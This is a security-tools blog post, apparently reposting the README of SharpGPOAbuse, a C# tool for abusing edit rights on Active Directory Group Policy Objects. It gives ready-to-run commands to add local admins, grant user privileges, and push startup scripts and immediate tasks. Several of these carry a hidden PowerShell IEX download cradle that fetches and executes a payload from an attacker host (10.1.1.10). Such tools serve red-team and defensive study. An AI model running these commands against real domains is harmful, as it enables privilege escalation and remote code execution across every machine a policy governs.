SharpGPOAbuse : Tool To Take Advantage Of A User’s Edit Rights On A Group Policy Object (GPO)

SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user’s edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse

Compile Instructions

Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.

Usage

Usage: SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attacks Types

Currently SharpGPOAbuse supports the following options:

OptionDescription
–AddUserRightsAdd rights to a user
–AddLocalAdminAdd a user to the local admins group
–AddComputerScriptAdd a new computer startup script
–AddUserScriptConfigure a user logon script
–AddComputerTaskConfigure a computer immediate task
–AddUserTaskAdd an immediate task to a user

Attack Options

  • Adding User Rights

Options required to add new user rights:
–UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
–UserAccount
Set the account to add the new rights.
–GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe –AddUserRights –UserRights “SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight” –UserAccount bob.smith –GPOName “Vulnerable GPO”

  • Adding a Local Admin

Options required to add a new local admin:
–UserAccount
Set the name of the account to be added in local admins.
–GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe –AddLocalAdmin –UserAccount bob.smith –GPOName “Vulnerable GPO”

  • Configuring a User or Computer Logon Script

Options required to add a new user or computer startup script:
–ScriptName
Set the name of the new startup script.
–ScriptContents
Set the contents of the new startup script.
–GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”

If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:

SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “if %username%== powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”

  • Configuring a Computer or User Immediate Task

Options required to add a new computer or user immediate task:

–TaskName
Set the name of the new computer task.
–Author
Set the author of the new task (use a DA account).
–Command
Command to execute.
–Arguments
Arguments passed to the command.
–GPOName
The name of the vulnerable GPO.

Additional User Task Options:

–FilterEnabled
Enable Target Filtering for user immediate tasks.
–TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format \
–TargetUserSID
The targeted user’s SID.

Additional Computer Task Options:
–FilterEnabled
Enable Target Filtering for computer immediate tasks.
–TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.

Example:
SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”

If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:

SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO” –FilterEnabled –TargetDnsName target.domain.com

Additional Options

OptionDescription
–DomainControllerSet the target domain controller
–DomainSet the target domain
–ForceOverwrite existing files if required
Download
R K

Share
Published by
R K
Tags: GPOSharpGPOAbuse
4 years ago

Recent Posts

SeamlessPass: Using Kerberos Tickets to Access Microsoft 365

SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…

59 minutes ago

PPLBlade: Advanced Memory Dumping and Obfuscation Tool

PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…

5 hours ago

HikPwn : Simple Scanner For Hikvision Devices With Basic Vulnerability Scanning

HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…

23 hours ago

Comments in Bash Scripts

What Are Bash Comments? Comments in Bash scripts, are notes in your code that the…

6 days ago

Shebang (#!) in Bash Script

When you write a Bash script in Linux, you want it to run correctly every…

7 days ago

Bash String Concatenation – Bash Scripting

Introduction If you’re new to Bash scripting, one of the first skills you’ll need is…

1 week ago